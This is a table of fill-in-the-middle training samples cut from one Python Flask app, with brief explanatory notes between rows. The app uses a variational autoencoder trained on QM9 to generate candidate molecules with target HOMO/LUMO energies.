| file_name (large_string, length 4–140) | prefix (large_string, length 0–12.1k) | suffix (large_string, length 0–12k) | middle (large_string, length 0–7.51k) | fim_type (large_string, 4 classes) |
---|---|---|---|---|
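Each row below is a fill-in-the-middle (FIM) sample: a source file is split into a `prefix`, a held-out `middle`, and a `suffix`, and `fim_type` records how the split was made (`identifier_name`, `identifier_body`, `conditional_block`, or `random_line_split`). A minimal sketch of how such a row could be consumed follows; the field values in it are illustrative placeholders, not actual dataset rows.

```python
# Minimal sketch: reassembling one fill-in-the-middle (FIM) sample.
# The field values below are illustrative placeholders, not rows from the dataset.
row = {
    "file_name": "web_8_ReduceMemory.py",
    "prefix": "def ",
    "middle": "smiles_encoder",
    "suffix": "(smiles, maxlen=34):\n    ...",
    "fim_type": "identifier_name",
}

# The ground truth is simply prefix + middle + suffix; a model is asked to
# predict `middle` given only `prefix` and `suffix`.
reconstructed = row["prefix"] + row["middle"] + row["suffix"]
print(row["fim_type"], "->", reconstructed.splitlines()[0])
```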
web_8_ReduceMemory.py
|
(SMILES_CHARS))
def
|
(smiles, maxlen=34):
#print(smiles)
#smiles = Chem.MolToSmiles(Chem.MolFromSmiles(smiles))
#print(smiles)
X = np.zeros((maxlen, len(SMILES_CHARS)))
for i, c in enumerate(smiles):
#print(i)
#print(c)
X[i, smi2index[c]] = 1
return X
def smiles_decoder( X ):
smi = ''
X = X.argmax( axis=-1 )
for i in X:
smi += index2smi[ i ]
return smi
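For reference, the encoder/decoder pair above is a plain per-character one-hot codec over a fixed SMILES alphabet. The real `SMILES_CHARS`, `smi2index`, and `index2smi` tables are presumably defined earlier in the full file (only a fragment appears in this excerpt), so the round-trip sketch below uses a small illustrative alphabet that only covers its own example string, with `' '` as the padding character to match `add_space()`.

```python
import numpy as np

# Toy alphabet standing in for the real SMILES_CHARS table (not shown in this
# excerpt); ' ' is the padding character used by add_space().
SMILES_CHARS = [' ', '#', '(', ')', '1', '=', 'C', 'N', 'O']
smi2index = {c: i for i, c in enumerate(SMILES_CHARS)}
index2smi = {i: c for i, c in enumerate(SMILES_CHARS)}

def smiles_encoder(smiles, maxlen=34):
    # one-hot matrix: one row per character position, one column per symbol
    X = np.zeros((maxlen, len(SMILES_CHARS)))
    for i, c in enumerate(smiles):
        X[i, smi2index[c]] = 1
    return X

def smiles_decoder(X):
    # invert the one-hot encoding by taking the argmax of each row
    return ''.join(index2smi[i] for i in X.argmax(axis=-1))

smiles = 'C1=CC=CC=C1O'.ljust(34)          # pad to maxlen, as add_space() does
assert smiles_decoder(smiles_encoder(smiles)) == smiles
```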
def dist_cal(latent_space_train, pos, dim = 0.5):
#dist = (latent_space_train - pos)**dim
dist = (latent_space_train - pos)**dim
dist = np.sum(dist, axis=1)
dist = dist**(1/dim)
return(dist)
def load_model_data():
# load the pre-trained Keras models: the VAE encoder/decoder and the
# HOMO/LUMO property predictors (substitute your own networks if needed)
global homo_model, lumo_model, encoder, decoder
homo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_homo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
lumo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_lumo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
encoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_encoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_decoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder._make_predict_function()
#####data
def add_space(raw_data, input_dim = 34):
out = []
for i in raw_data:
if len(i) < input_dim:
out.append(i+' '*(input_dim - len(i)))
else:
out.append(i)
return(out)
global out
out_raw = pd.read_csv('./QM9_data/QM9_smiles.csv', header = None)[0]
out = add_space(out_raw)
QM9_hot = []
for i in out:
QM9_hot.append(smiles_encoder(i))
#properties
QM9_properties = pd.read_csv('./QM9_data/QM9_properties.csv')
QM9_properties.columns = ['tag', 'index', 'A', 'B', 'C', 'mu', 'alpha', 'homo', 'lumo',
'gap', 'r2', 'zpve', 'U0', 'U', 'H', 'G', 'Cv']
global x_train, y_homo, y_lumo
x_train = QM9_hot
x_train = np.reshape(x_train, (len(x_train), 34, 22))
y_homo = QM9_properties['homo']
y_homo = np.reshape(y_homo, (len(y_homo)))
y_lumo = QM9_properties['lumo']
y_lumo = np.reshape(y_lumo, (len(y_lumo)))
global latent_space_train
latent_space_train= encoder.predict(x_train)[0][:,:156]
global prediction_homo, prediction_lumo
prediction_homo = homo_model.predict(encoder.predict(x_train)[1])
prediction_lumo = lumo_model.predict(encoder.predict(x_train)[1])
def value_func(homo_desire, lumo_desire, y_homo, y_lumo, std = 0.1):
#### use the true property values to compute the desirability score
## normalized to 0 - 1
homo_value_fun = norm.pdf(y_homo, homo_desire, std)/norm.pdf(homo_desire, homo_desire, std)
lumo_value_fun = norm.pdf(y_lumo, lumo_desire, std)/norm.pdf(lumo_desire, lumo_desire, std)
return(homo_value_fun*lumo_value_fun)
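The score above is a product of two normalised Gaussian kernels: each factor is `norm.pdf(y, desire, std) / norm.pdf(desire, desire, std)`, i.e. `exp(-(y - desire)**2 / (2 * std**2))`, so a molecule hitting both targets scores 1 and the score decays smoothly with the distance from each target. A small self-contained check (the function is restated verbatim so the snippet runs on its own; the property values are made up for illustration):

```python
import numpy as np
from scipy.stats import norm

def value_func(homo_desire, lumo_desire, y_homo, y_lumo, std=0.1):
    homo_value_fun = norm.pdf(y_homo, homo_desire, std) / norm.pdf(homo_desire, homo_desire, std)
    lumo_value_fun = norm.pdf(y_lumo, lumo_desire, std) / norm.pdf(lumo_desire, lumo_desire, std)
    return homo_value_fun * lumo_value_fun

# Three hypothetical molecules; the first matches both targets exactly.
y_homo = np.array([-0.25, -0.30, -0.35])
y_lumo = np.array([ 0.01,  0.05,  0.10])
scores = value_func(-0.25, 0.01, y_homo, y_lumo, std=0.1)
print(scores)                       # approx [1.00, 0.81, 0.40]
best = np.argsort(scores)[-1]       # same selection rule used in calculation()
```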
def ran_sphere(n = 10000, pos = np.array([0, 0]), dis = 5, dim = 156):
np.random.seed(random_seed)
random.seed(random_seed)
outt = np.array([None]*dim)
for i in range(n):
#d = 2
u = np.random.normal(0,1,dim) # an array of d normally distributed random variables
norm=np.sum(u**2) **(0.5)
r = random.random()**(1/dim)
x= dis*r*u/norm
x = x + pos
outt = np.vstack((outt, x))
outt = np.delete(outt, 0, 0)
return(outt)
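`ran_sphere` draws points uniformly inside a `dim`-dimensional ball of radius `dis` centred at `pos`: directions come from a normalised Gaussian and radii from `dis * U**(1/dim)`. Below is a quick, self-contained sanity check of that sampling scheme, rewritten in vectorised form purely for the check (it is not the function above, and the seed is an arbitrary choice):

```python
import numpy as np

# Vectorised restatement of the sampling scheme in ran_sphere(), used here only
# as a sanity check: unit directions from a normalised Gaussian, radii from
# dis * U**(1/dim), which together give points uniform in volume inside the ball.
rng = np.random.default_rng(0)
n, dim, dis = 1000, 156, 5.0
pos = np.zeros(dim)

u = rng.normal(size=(n, dim))
u /= np.linalg.norm(u, axis=1, keepdims=True)      # points on the unit sphere
r = dis * rng.random(n) ** (1.0 / dim)             # radii (uniform in volume)
samples = pos + r[:, None] * u

radii = np.linalg.norm(samples - pos, axis=1)
assert radii.max() <= dis                          # every sample lies inside the ball
# In 156 dimensions almost all of the ball's volume sits near the surface,
# so the radii concentrate just below dis.
```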
######## web app
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
model = None
@app.route("/")
def index():
#name = request.args['name']
return render_template("request_holu.html");
@app.route('/result/',methods = ['POST', 'GET'])
def result():
if request.method == 'POST':
homo_desire = float(request.form['homo_desire'])
lumo_desire = float(request.form['lumo_desire'])
ramdom_sample_value = int(request.form['ramdom_sample_value'])
dis = int(request.form['dis'])
std = float(request.form['std'])
pd_desire, predict_list, opti, nei_t5, highest_desire_value_index = calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std)
return render_template("result.html",
homo_desire = homo_desire,
lumo_desire = lumo_desire,
ramdom_sample_value = ramdom_sample_value,
dis = dis,
std =std,
predict_list = predict_list,
highest_desire_value_index = highest_desire_value_index,
out = out,
y_homo = y_homo,
y_lumo = y_lumo
)
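For completeness, the `/result/` route expects a form POST with the five fields read above. A hypothetical client-side call against a locally running instance is sketched below; the host and port are assumptions, while the route and field names come from `result()`:

```python
import requests

# Hypothetical client call against a locally running instance of this app;
# the URL host/port are assumptions, the route and field names come from result().
form = {
    "homo_desire": -0.25,
    "lumo_desire": 0.01,
    "ramdom_sample_value": 100,   # field is spelled this way in the app
    "dis": 5,
    "std": 0.1,
}
resp = requests.post("http://127.0.0.1:5000/result/", data=form)
print(resp.status_code)
```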
#@app.route("/calculation/<float(signed=True):homo_desire>/<float(signed=True):lumo_desire>/<int:ramdom_sample_value>/<int:dis>/<float:std>")
def calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std):
#pd_desire: predictions for the sampled (desired) latent space; contains ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction']
#predict_list: the predictions from pd_desire within the desired Euclidean distance
desire_value = value_func(homo_desire, lumo_desire, y_homo = y_homo, y_lumo = y_lumo, std = std)
highest_desire_value_index = np.argsort(desire_value)[-1]
desire_space = ran_sphere(n = ramdom_sample_value, pos = latent_space_train[highest_desire_value_index], dis = dis).reshape(-1,156)
decode_m = decoder.predict(desire_space)
desire_homo_prediction = homo_model.predict(desire_space)
desire_lumo_prediction = lumo_model.predict(desire_space)
predict_st = []
for i in decode_m:
predict_st.append(smiles_decoder(i))
predict_dict_uniq = np.unique(predict_st)
###
valid_molecular = []
for i, x in enumerate(predict_dict_uniq):
#print(x)
m = Chem.MolFromSmiles(x, sanitize=False)
if m is None:
valid_molecular.append('XXXXX')
else:
valid_molecular.append(x)
###
final_prediction = []
predict_dict = { i : 0 for i in valid_molecular }
for i in predict_st:
if i in predict_dict:
predict_dict[i] += 1
final_prediction.append(i)
else:
predict_dict['XXXXX'] += 1
final_prediction.append('XXXXX')
opti = pca.transform(latent_space_train[highest_desire_value_index].reshape(1,156))
nei_t5 = pca.transform(desire_space)
pd_desire = pd.DataFrame(data=nei_t5, columns = ['PCA1', 'PCA2'])
pd_desire = pd.concat([pd_desire, pd.DataFrame(desire_homo_prediction), pd.DataFrame(desire_lumo_prediction), pd.DataFrame(predict_st), pd.DataFrame(final_prediction), pd.DataFrame(desire_value)], axis = 1)
pd_desire.columns = ['PCA1', 'PCA2', '
|
smiles_encoder
|
identifier_name
|
web_8_ReduceMemory.py
|
(SMILES_CHARS))
def smiles_encoder(smiles, maxlen=34):
#print(smiles)
#smiles = Chem.MolToSmiles(Chem.MolFromSmiles(smiles))
#print(smiles)
X = np.zeros((maxlen, len(SMILES_CHARS)))
for i, c in enumerate(smiles):
#print(i)
#print(c)
X[i, smi2index[c]] = 1
return X
def smiles_decoder( X ):
smi = ''
X = X.argmax( axis=-1 )
for i in X:
smi += index2smi[ i ]
return smi
def dist_cal(latent_space_train, pos, dim = 0.5):
#dist = (latent_space_train - pos)**dim
dist = (latent_space_train - pos)**dim
dist = np.sum(dist, axis=1)
dist = dist**(1/dim)
return(dist)
def load_model_data():
# load the pre-trained Keras models: the VAE encoder/decoder and the
# HOMO/LUMO property predictors (substitute your own networks if needed)
global homo_model, lumo_model, encoder, decoder
homo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_homo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
lumo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_lumo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
encoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_encoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_decoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder._make_predict_function()
#####data
def add_space(raw_data, input_dim = 34):
out = []
for i in raw_data:
if len(i) < input_dim:
out.append(i+' '*(input_dim - len(i)))
else:
out.append(i)
return(out)
global out
out_raw = pd.read_csv('./QM9_data/QM9_smiles.csv', header = None)[0]
out = add_space(out_raw)
QM9_hot = []
for i in out:
QM9_hot.append(smiles_encoder(i))
#properties
QM9_properties = pd.read_csv('./QM9_data/QM9_properties.csv')
QM9_properties.columns = ['tag', 'index', 'A', 'B', 'C', 'mu', 'alpha', 'homo', 'lumo',
'gap', 'r2', 'zpve', 'U0', 'U', 'H', 'G', 'Cv']
global x_train, y_homo, y_lumo
x_train = QM9_hot
x_train = np.reshape(x_train, (len(x_train), 34, 22))
y_homo = QM9_properties['homo']
y_homo = np.reshape(y_homo, (len(y_homo)))
y_lumo = QM9_properties['lumo']
y_lumo = np.reshape(y_lumo, (len(y_lumo)))
global latent_space_train
latent_space_train= encoder.predict(x_train)[0][:,:156]
global prediction_homo, prediction_lumo
prediction_homo = homo_model.predict(encoder.predict(x_train)[1])
prediction_lumo = lumo_model.predict(encoder.predict(x_train)[1])
def value_func(homo_desire, lumo_desire, y_homo, y_lumo, std = 0.1):
#### use the true property values to compute the desirability score
## normalized to 0 - 1
homo_value_fun = norm.pdf(y_homo, homo_desire, std)/norm.pdf(homo_desire, homo_desire, std)
lumo_value_fun = norm.pdf(y_lumo, lumo_desire, std)/norm.pdf(lumo_desire, lumo_desire, std)
return(homo_value_fun*lumo_value_fun)
def ran_sphere(n = 10000, pos = np.array([0, 0]), dis = 5, dim = 156):
np.random.seed(random_seed)
random.seed(random_seed)
outt = np.array([None]*dim)
for i in range(n):
#d = 2
|
outt = np.delete(outt, 0, 0)
return(outt)
######## web app
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
model = None
@app.route("/")
def index():
#name = request.args['name']
return render_template("request_holu.html");
@app.route('/result/',methods = ['POST', 'GET'])
def result():
if request.method == 'POST':
homo_desire = float(request.form['homo_desire'])
lumo_desire = float(request.form['lumo_desire'])
ramdom_sample_value = int(request.form['ramdom_sample_value'])
dis = int(request.form['dis'])
std = float(request.form['std'])
pd_desire, predict_list, opti, nei_t5, highest_desire_value_index = calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std)
return render_template("result.html",
homo_desire = homo_desire,
lumo_desire = lumo_desire,
ramdom_sample_value = ramdom_sample_value,
dis = dis,
std =std,
predict_list = predict_list,
highest_desire_value_index = highest_desire_value_index,
out = out,
y_homo = y_homo,
y_lumo = y_lumo
)
#@app.route("/calculation/<float(signed=True):homo_desire>/<float(signed=True):lumo_desire>/<int:ramdom_sample_value>/<int:dis>/<float:std>")
def calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std):
#pd_desire: predictions for the sampled (desired) latent space; contains ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction']
#predict_list: the predictions from pd_desire within the desired Euclidean distance
desire_value = value_func(homo_desire, lumo_desire, y_homo = y_homo, y_lumo = y_lumo, std = std)
highest_desire_value_index = np.argsort(desire_value)[-1]
desire_space = ran_sphere(n = ramdom_sample_value, pos = latent_space_train[highest_desire_value_index], dis = dis).reshape(-1,156)
decode_m = decoder.predict(desire_space)
desire_homo_prediction = homo_model.predict(desire_space)
desire_lumo_prediction = lumo_model.predict(desire_space)
predict_st = []
for i in decode_m:
predict_st.append(smiles_decoder(i))
predict_dict_uniq = np.unique(predict_st)
###
valid_molecular = []
for i, x in enumerate(predict_dict_uniq):
#print(x)
m = Chem.MolFromSmiles(x, sanitize=False)
if m is None:
valid_molecular.append('XXXXX')
else:
valid_molecular.append(x)
###
final_prediction = []
predict_dict = { i : 0 for i in valid_molecular }
for i in predict_st:
if i in predict_dict:
predict_dict[i] += 1
final_prediction.append(i)
else:
predict_dict['XXXXX'] += 1
final_prediction.append('XXXXX')
opti = pca.transform(latent_space_train[highest_desire_value_index].reshape(1,156))
nei_t5 = pca.transform(desire_space)
pd_desire = pd.DataFrame(data=nei_t5, columns = ['PCA1', 'PCA2'])
pd_desire = pd.concat([pd_desire, pd.DataFrame(desire_homo_prediction), pd.DataFrame(desire_lumo_prediction), pd.DataFrame(predict_st), pd.DataFrame(final_prediction), pd.DataFrame(desire_value)], axis = 1)
pd_desire.columns = ['PCA1', 'PCA2', 'des
|
u = np.random.normal(0,1,dim) # an array of d normally distributed random variables
norm=np.sum(u**2) **(0.5)
r = random.random()**(1/dim)
x= dis*r*u/norm
x = x + pos
outt = np.vstack((outt, x))
|
conditional_block
|
web_8_ReduceMemory.py
|
(SMILES_CHARS))
def smiles_encoder(smiles, maxlen=34):
#print(smiles)
#smiles = Chem.MolToSmiles(Chem.MolFromSmiles(smiles))
#print(smiles)
X = np.zeros((maxlen, len(SMILES_CHARS)))
for i, c in enumerate(smiles):
#print(i)
#print(c)
X[i, smi2index[c]] = 1
return X
def smiles_decoder( X ):
smi = ''
X = X.argmax( axis=-1 )
for i in X:
smi += index2smi[ i ]
return smi
def dist_cal(latent_space_train, pos, dim = 0.5):
#dist = (latent_space_train - pos)**dim
dist = (latent_space_train - pos)**dim
dist = np.sum(dist, axis=1)
dist = dist**(1/dim)
return(dist)
def load_model_data():
# load the pre-trained Keras models: the VAE encoder/decoder and the
# HOMO/LUMO property predictors (substitute your own networks if needed)
global homo_model, lumo_model, encoder, decoder
homo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_homo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
lumo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_lumo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
encoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_encoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_decoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder._make_predict_function()
#####data
def add_space(raw_data, input_dim = 34):
out = []
for i in raw_data:
if len(i) < input_dim:
out.append(i+' '*(input_dim - len(i)))
else:
out.append(i)
return(out)
global out
out_raw = pd.read_csv('./QM9_data/QM9_smiles.csv', header = None)[0]
out = add_space(out_raw)
QM9_hot = []
for i in out:
QM9_hot.append(smiles_encoder(i))
#properties
QM9_properties = pd.read_csv('./QM9_data/QM9_properties.csv')
QM9_properties.columns = ['tag', 'index', 'A', 'B', 'C', 'mu', 'alpha', 'homo', 'lumo',
'gap', 'r2', 'zpve', 'U0', 'U', 'H', 'G', 'Cv']
global x_train, y_homo, y_lumo
x_train = QM9_hot
x_train = np.reshape(x_train, (len(x_train), 34, 22))
y_homo = QM9_properties['homo']
y_homo = np.reshape(y_homo, (len(y_homo)))
y_lumo = QM9_properties['lumo']
y_lumo = np.reshape(y_lumo, (len(y_lumo)))
global latent_space_train
latent_space_train= encoder.predict(x_train)[0][:,:156]
global prediction_homo, prediction_lumo
prediction_homo = homo_model.predict(encoder.predict(x_train)[1])
prediction_lumo = lumo_model.predict(encoder.predict(x_train)[1])
def value_func(homo_desire, lumo_desire, y_homo, y_lumo, std = 0.1):
#### use the true property values to compute the desirability score
## normalized to 0 - 1
homo_value_fun = norm.pdf(y_homo, homo_desire, std)/norm.pdf(homo_desire, homo_desire, std)
lumo_value_fun = norm.pdf(y_lumo, lumo_desire, std)/norm.pdf(lumo_desire, lumo_desire, std)
return(homo_value_fun*lumo_value_fun)
def ran_sphere(n = 10000, pos = np.array([0, 0]), dis = 5, dim = 156):
np.random.seed(random_seed)
random.seed(random_seed)
outt = np.array([None]*dim)
for i in range(n):
#d = 2
u = np.random.normal(0,1,dim) # an array of d normally distributed random variables
norm=np.sum(u**2) **(0.5)
r = random.random()**(1/dim)
x= dis*r*u/norm
x = x + pos
outt = np.vstack((outt, x))
outt = np.delete(outt, 0, 0)
return(outt)
######## web app
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
model = None
@app.route("/")
def index():
#name = request.args['name']
return render_template("request_holu.html");
@app.route('/result/',methods = ['POST', 'GET'])
def result():
|
y_homo = y_homo,
y_lumo = y_lumo
)
#@app.route("/calculation/<float(signed=True):homo_desire>/<float(signed=True):lumo_desire>/<int:ramdom_sample_value>/<int:dis>/<float:std>")
def calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std):
#pd_desire: predictions for the sampled (desired) latent space; contains ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction']
#predict_list: the predictions from pd_desire within the desired Euclidean distance
desire_value = value_func(homo_desire, lumo_desire, y_homo = y_homo, y_lumo = y_lumo, std = std)
highest_desire_value_index = np.argsort(desire_value)[-1]
desire_space = ran_sphere(n = ramdom_sample_value, pos = latent_space_train[highest_desire_value_index], dis = dis).reshape(-1,156)
decode_m = decoder.predict(desire_space)
desire_homo_prediction = homo_model.predict(desire_space)
desire_lumo_prediction = lumo_model.predict(desire_space)
predict_st = []
for i in decode_m:
predict_st.append(smiles_decoder(i))
predict_dict_uniq = np.unique(predict_st)
###
valid_molecular = []
for i, x in enumerate(predict_dict_uniq):
#print(x)
m = Chem.MolFromSmiles(x, sanitize=False)
if m is None:
valid_molecular.append('XXXXX')
else:
valid_molecular.append(x)
###
final_prediction = []
predict_dict = { i : 0 for i in valid_molecular }
for i in predict_st:
if i in predict_dict:
predict_dict[i] += 1
final_prediction.append(i)
else:
predict_dict['XXXXX'] += 1
final_prediction.append('XXXXX')
opti = pca.transform(latent_space_train[highest_desire_value_index].reshape(1,156))
nei_t5 = pca.transform(desire_space)
pd_desire = pd.DataFrame(data=nei_t5, columns = ['PCA1', 'PCA2'])
pd_desire = pd.concat([pd_desire, pd.DataFrame(desire_homo_prediction), pd.DataFrame(desire_lumo_prediction), pd.DataFrame(predict_st), pd.DataFrame(final_prediction), pd.DataFrame(desire_value)], axis = 1)
pd_desire.columns = ['PCA1', 'PCA2', 'desire
|
if request.method == 'POST':
homo_desire = float(request.form['homo_desire'])
lumo_desire = float(request.form['lumo_desire'])
ramdom_sample_value = int(request.form['ramdom_sample_value'])
dis = int(request.form['dis'])
std = float(request.form['std'])
pd_desire, predict_list, opti, nei_t5, highest_desire_value_index = calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std)
return render_template("result.html",
homo_desire = homo_desire,
lumo_desire = lumo_desire,
ramdom_sample_value = ramdom_sample_value,
dis = dis,
std =std,
predict_list = predict_list,
highest_desire_value_index = highest_desire_value_index,
out = out,
|
identifier_body
|
web_8_ReduceMemory.py
|
_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
encoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_encoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_decoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder._make_predict_function()
#####data
def add_space(raw_data, input_dim = 34):
out = []
for i in raw_data:
if len(i) < input_dim:
out.append(i+' '*(input_dim - len(i)))
else:
out.append(i)
return(out)
global out
out_raw = pd.read_csv('./QM9_data/QM9_smiles.csv', header = None)[0]
out = add_space(out_raw)
QM9_hot = []
for i in out:
QM9_hot.append(smiles_encoder(i))
#properties
QM9_properties = pd.read_csv('./QM9_data/QM9_properties.csv')
QM9_properties.columns = ['tag', 'index', 'A', 'B', 'C', 'mu', 'alpha', 'homo', 'lumo',
'gap', 'r2', 'zpve', 'U0', 'U', 'H', 'G', 'Cv']
global x_train, y_homo, y_lumo
x_train = QM9_hot
x_train = np.reshape(x_train, (len(x_train), 34, 22))
y_homo = QM9_properties['homo']
y_homo = np.reshape(y_homo, (len(y_homo)))
y_lumo = QM9_properties['lumo']
y_lumo = np.reshape(y_lumo, (len(y_lumo)))
global latent_space_train
latent_space_train= encoder.predict(x_train)[0][:,:156]
global prediction_homo, prediction_lumo
prediction_homo = homo_model.predict(encoder.predict(x_train)[1])
prediction_lumo = lumo_model.predict(encoder.predict(x_train)[1])
def value_func(homo_desire, lumo_desire, y_homo, y_lumo, std = 0.1):
#### use the true property values to compute the desirability score
## normalized to 0 - 1
homo_value_fun = norm.pdf(y_homo, homo_desire, std)/norm.pdf(homo_desire, homo_desire, std)
lumo_value_fun = norm.pdf(y_lumo, lumo_desire, std)/norm.pdf(lumo_desire, lumo_desire, std)
return(homo_value_fun*lumo_value_fun)
def ran_sphere(n = 10000, pos = np.array([0, 0]), dis = 5, dim = 156):
np.random.seed(random_seed)
random.seed(random_seed)
outt = np.array([None]*dim)
for i in range(n):
#d = 2
u = np.random.normal(0,1,dim) # an array of d normally distributed random variables
norm=np.sum(u**2) **(0.5)
r = random.random()**(1/dim)
x= dis*r*u/norm
x = x + pos
outt = np.vstack((outt, x))
outt = np.delete(outt, 0, 0)
return(outt)
######## web app
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
model = None
@app.route("/")
def index():
#name = request.args['name']
return render_template("request_holu.html");
@app.route('/result/',methods = ['POST', 'GET'])
def result():
if request.method == 'POST':
homo_desire = float(request.form['homo_desire'])
lumo_desire = float(request.form['lumo_desire'])
ramdom_sample_value = int(request.form['ramdom_sample_value'])
dis = int(request.form['dis'])
std = float(request.form['std'])
pd_desire, predict_list, opti, nei_t5, highest_desire_value_index = calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std)
return render_template("result.html",
homo_desire = homo_desire,
lumo_desire = lumo_desire,
ramdom_sample_value = ramdom_sample_value,
dis = dis,
std =std,
predict_list = predict_list,
highest_desire_value_index = highest_desire_value_index,
out = out,
y_homo = y_homo,
y_lumo = y_lumo
)
#@app.route("/calculation/<float(signed=True):homo_desire>/<float(signed=True):lumo_desire>/<int:ramdom_sample_value>/<int:dis>/<float:std>")
def calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std):
#pd_desire: predictions for the sampled (desired) latent space; contains ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction']
#predict_list: the predictions from pd_desire within the desired Euclidean distance
desire_value = value_func(homo_desire, lumo_desire, y_homo = y_homo, y_lumo = y_lumo, std = std)
highest_desire_value_index = np.argsort(desire_value)[-1]
desire_space = ran_sphere(n = ramdom_sample_value, pos = latent_space_train[highest_desire_value_index], dis = dis).reshape(-1,156)
decode_m = decoder.predict(desire_space)
desire_homo_prediction = homo_model.predict(desire_space)
desire_lumo_prediction = lumo_model.predict(desire_space)
predict_st = []
for i in decode_m:
predict_st.append(smiles_decoder(i))
predict_dict_uniq = np.unique(predict_st)
###
valid_molecular = []
for i, x in enumerate(predict_dict_uniq):
#print(x)
m = Chem.MolFromSmiles(x, sanitize=False)
if m is None:
valid_molecular.append('XXXXX')
else:
valid_molecular.append(x)
###
final_prediction = []
predict_dict = { i : 0 for i in valid_molecular }
for i in predict_st:
if i in predict_dict:
predict_dict[i] += 1
final_prediction.append(i)
else:
predict_dict['XXXXX'] += 1
final_prediction.append('XXXXX')
opti = pca.transform(latent_space_train[highest_desire_value_index].reshape(1,156))
nei_t5 = pca.transform(desire_space)
pd_desire = pd.DataFrame(data=nei_t5, columns = ['PCA1', 'PCA2'])
pd_desire = pd.concat([pd_desire, pd.DataFrame(desire_homo_prediction), pd.DataFrame(desire_lumo_prediction), pd.DataFrame(predict_st), pd.DataFrame(final_prediction), pd.DataFrame(desire_value)], axis = 1)
pd_desire.columns = ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction', 'desire_value']
for i in predict_dict:
count_num = predict_dict[i]
predict_dict[i] = [round(predict_dict[i]/ramdom_sample_value, 3)]
if i in out:
y_homo_tem = y_homo[out.index(i)]
y_lumo_tem = y_lumo[out.index(i)]
else:
y_homo_tem = None
y_lumo_tem = None
pre_homo_tem_mean = pd_desire[pd_desire['smiles'] == i]['desire_homo_prediction'].mean()
pre_homo_tem_std = pd_desire[pd_desire['smiles'] == i]['desire_homo_prediction'].std()
pre_lumo_tem_mean = pd_desire[pd_desire['smiles'] == i]['desire_lumo_prediction'].mean()
pre_lumo_tem_std = pd_desire[pd_desire['smiles'] == i]['desire_lumo_prediction'].std()
desire_value_mean = pd_desire[pd_desire['smiles'] == i]['desire_value'].mean()
desire_value_std = pd_desire[pd_desire['smiles'] == i]['desire_value'].std()
predict_dict[i].extend([y_homo_tem, y_lumo_tem, pre_homo_tem_mean, pre_homo_tem_std, pre_lumo_tem_mean, pre_lumo_tem_std, count_num, desire_value_mean, desire_value_std])
